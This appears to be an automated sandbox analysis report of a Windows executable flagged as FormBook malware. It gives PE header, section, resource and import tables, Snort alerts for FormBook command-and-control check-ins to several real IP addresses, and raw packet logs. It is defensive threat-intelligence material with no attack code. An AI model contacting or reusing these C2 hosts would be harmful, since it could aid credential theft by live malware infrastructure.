                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                DLL Characteristics:
                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:cc1fadbd23c2bfd0a0322aa7e67d1d3f

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                push ebp
                                                                                                mov ebp, esp
                                                                                                add esp, FFFFFFF0h
                                                                                                mov eax, 0046D498h
                                                                                                call 00007F33D102DD49h
                                                                                                mov eax, dword ptr [0049E398h]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007F33D107B29Dh
                                                                                                mov eax, dword ptr [0049E398h]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov edx, 0046E7F0h
                                                                                                call 00007F33D107AD24h
                                                                                                mov ecx, dword ptr [0049E370h]
                                                                                                mov eax, dword ptr [0049E398h]
                                                                                                mov eax, dword ptr [eax]
                                                                                                mov edx, dword ptr [0046C444h]
                                                                                                call 00007F33D107B28Ch
                                                                                                mov eax, dword ptr [0049E398h]
                                                                                                mov eax, dword ptr [eax]
                                                                                                call 00007F33D107B300h
                                                                                                call 00007F33D102BE0Fh
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa30000x2804.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xaf0000xd200.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000x6230.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0xa70000x18.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xa37740x634.idata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x6c6d00x6c800False0.5343349474366359data6.574486068299734IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .itext0x6e0000x8040xa00False0.5125data5.495016511395614IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .data0x6f0000x2f5180x2f600False0.5352490105540897data7.287870053980081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .bss0x9f0000x37f80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .idata0xa30000x28040x2a00False0.3078497023809524data4.926344413190151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .tls0xa60000x340x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rdata0xa70000x180x200False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0xa80000x62300x6400False0.638359375data6.654765582765188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0xaf0000xd2000xd200False0.10805431547619047data3.352529991615067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_CURSOR0xaf71c0x134dataEnglishUnited States
                                                                                                RT_CURSOR0xaf8500x134dataEnglishUnited States
                                                                                                RT_CURSOR0xaf9840x134dataEnglishUnited States
                                                                                                RT_CURSOR0xafab80x134dataEnglishUnited States
                                                                                                RT_CURSOR0xafbec0x134dataEnglishUnited States
                                                                                                RT_CURSOR0xafd200x134dataEnglishUnited States
                                                                                                RT_CURSOR0xafe540x134dataEnglishUnited States
                                                                                                RT_ICON0xaff880x94a8data
                                                                                                RT_ICON0xb94300x468GLS_BINARY_LSB_FIRST
                                                                                                RT_STRING0xb98980x2f8data
                                                                                                RT_STRING0xb9b900xbcdata
                                                                                                RT_STRING0xb9c4c0x110data
                                                                                                RT_STRING0xb9d5c0x4a0data
                                                                                                RT_STRING0xba1fc0x348data
                                                                                                RT_STRING0xba5440x394data
                                                                                                RT_STRING0xba8d80x3f8data
                                                                                                RT_STRING0xbacd00xf4data
                                                                                                RT_STRING0xbadc40xc4data
                                                                                                RT_STRING0xbae880x22cdata
                                                                                                RT_STRING0xbb0b40x3b4data
                                                                                                RT_STRING0xbb4680x368data
                                                                                                RT_STRING0xbb7d00x2b8data
                                                                                                RT_RCDATA0xbba880x10data
                                                                                                RT_RCDATA0xbba980x2d8data
                                                                                                RT_RCDATA0xbbd700x1e5Delphi compiled form 'TDuckForm'
                                                                                                RT_GROUP_CURSOR0xbbf580x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_CURSOR0xbbf6c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_CURSOR0xbbf800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_CURSOR0xbbf940x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_CURSOR0xbbfa80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_CURSOR0xbbfbc0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_CURSOR0xbbfd00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                RT_GROUP_ICON0xbbfe40x22data

                                                                                                Imports

                                                                                                DLLImport
                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, ChangeDisplaySettingsA, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                msimg32.dllTransparentBlt, AlphaBlend
                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileAttributesA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, InitializeAcl
                                                                                                kernel32.dllSleep
                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                                                URLAddMIMEFileTypesPS

                                                                                                Possible Origin

                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                192.168.2.338.54.163.5749861802031449 08/08/22-20:15:40.535789TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.338.54.163.57
                                                                                                192.168.2.315.197.142.17349863802031453 08/08/22-20:16:21.818812TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986380192.168.2.315.197.142.173
                                                                                                192.168.2.334.102.136.18049839802031449 08/08/22-20:14:24.056805TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.334.102.136.180
                                                                                                192.168.2.338.54.163.5749861802031412 08/08/22-20:15:40.535789TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.338.54.163.57
                                                                                                192.168.2.315.197.142.17349863802031412 08/08/22-20:16:21.818812TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986380192.168.2.315.197.142.173
                                                                                                192.168.2.338.54.163.5749861802031453 08/08/22-20:15:40.535789TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986180192.168.2.338.54.163.57
                                                                                                192.168.2.3198.54.117.21849849802031453 08/08/22-20:14:29.416650TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.3198.54.117.218
                                                                                                192.168.2.334.102.136.18049839802031453 08/08/22-20:14:24.056805TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.334.102.136.180
                                                                                                192.168.2.334.102.136.18049839802031412 08/08/22-20:14:24.056805TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.334.102.136.180
                                                                                                192.168.2.3198.54.117.21849849802031449 08/08/22-20:14:29.416650TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.3198.54.117.218
                                                                                                192.168.2.32.57.90.1649850802031449 08/08/22-20:14:34.726453TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.32.57.90.16
                                                                                                192.168.2.3198.54.117.21849849802031412 08/08/22-20:14:29.416650TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.3198.54.117.218
                                                                                                192.168.2.315.197.142.17349863802031449 08/08/22-20:16:21.818812TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986380192.168.2.315.197.142.173
                                                                                                192.168.2.32.57.90.1649850802031453 08/08/22-20:14:34.726453TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.32.57.90.16
                                                                                                192.168.2.32.57.90.1649850802031412 08/08/22-20:14:34.726453TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.32.57.90.16

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Aug 8, 2022 20:12:06.970721960 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:06.970777035 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:06.970897913 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.000993967 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.001035929 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.099013090 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.099107981 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.347546101 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.347594023 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.348143101 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.348376036 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.350692034 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.391401052 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.936290026 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.936433077 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:07.936461926 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:07.936553955 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.005918980 CEST49728443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.005959988 CEST4434972813.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:08.553364038 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.553414106 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:08.553508043 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.554105043 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.554135084 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:08.640991926 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:08.641114950 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.641644001 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.641664028 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:08.645796061 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:08.645817995 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:09.346910954 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:09.347021103 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:09.347054958 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:09.347173929 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:09.348762035 CEST49737443192.168.2.313.107.43.13
                                                                                                Aug 8, 2022 20:12:09.348795891 CEST4434973713.107.43.13192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.505234957 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.505291939 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.505388975 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.506093979 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.506124973 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.589283943 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.589453936 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.591114044 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.591228008 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.667932987 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.667958975 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.668307066 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.668385983 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.669054031 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.711433887 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921008110 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921055079 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921165943 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.921196938 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921258926 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921264887 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.921291113 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921360016 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.921380043 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.921390057 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921473980 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921587944 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921675920 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.921699047 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.921716928 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.921798944 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.923412085 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.923712969 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.923774004 CEST4434974613.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:29.923821926 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:29.923847914 CEST49746443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.650996923 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.651082993 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.651180983 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.651906967 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.651938915 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.742676973 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.742773056 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.743453979 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.743469954 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:30.748049974 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:30.748069048 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014241934 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014286995 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014365911 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014394045 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014421940 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.014453888 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014473915 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014498949 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.014518976 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.018021107 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.156469107 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156600952 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.156615019 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156641960 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156713963 CEST49748443192.168.2.313.107.43.12
                                                                                                Aug 8, 2022 20:12:31.156737089 CEST4434974813.107.43.12192.168.2.3
                                                                                                Aug 8, 2022 20:12:31.156761885 CEST4434974813.107.43.12192.168.2.3

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Aug 8, 2022 20:12:06.922441006 CEST4931653192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:12:08.069134951 CEST5641753192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:12:28.656106949 CEST5592353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:12:29.444283962 CEST5772353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:12:41.664526939 CEST5811653192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:12:42.633210897 CEST5742153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:13.530627966 CEST4972353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:13.662398100 CEST53497238.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:18.930552006 CEST5258153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:18.961222887 CEST53525818.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:24.016206980 CEST5015253192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:24.035969973 CEST53501528.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:29.220875025 CEST5242753192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:29.246108055 CEST53524278.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:34.659301996 CEST6272453192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:34.687539101 CEST53627248.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:39.783365965 CEST6494153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:39.852020979 CEST53649418.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:44.908478022 CEST5540353192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:45.086206913 CEST53554038.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:14:50.639390945 CEST6187753192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:14:50.809159994 CEST53618778.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:01.676448107 CEST6441253192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:01.709094048 CEST53644128.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:06.960392952 CEST5177953192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:07.235305071 CEST53517798.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:12.251024008 CEST5060853192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:12.281902075 CEST53506088.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:34.505660057 CEST5420553192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:34.530457973 CEST53542058.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:39.645056009 CEST6275653192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:39.959163904 CEST53627568.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:54.742095947 CEST5849753192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:54.761399984 CEST53584978.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:54.765111923 CEST6270153192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:54.796822071 CEST53627018.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:54.800062895 CEST5352453192.168.2.38.8.8.8
                                                                                                Aug 8, 2022 20:15:54.858072996 CEST53535248.8.8.8192.168.2.3
                                                                                                Aug 8, 2022 20:15:59.877633095 CEST5856153192.168.2.38.8.8.8
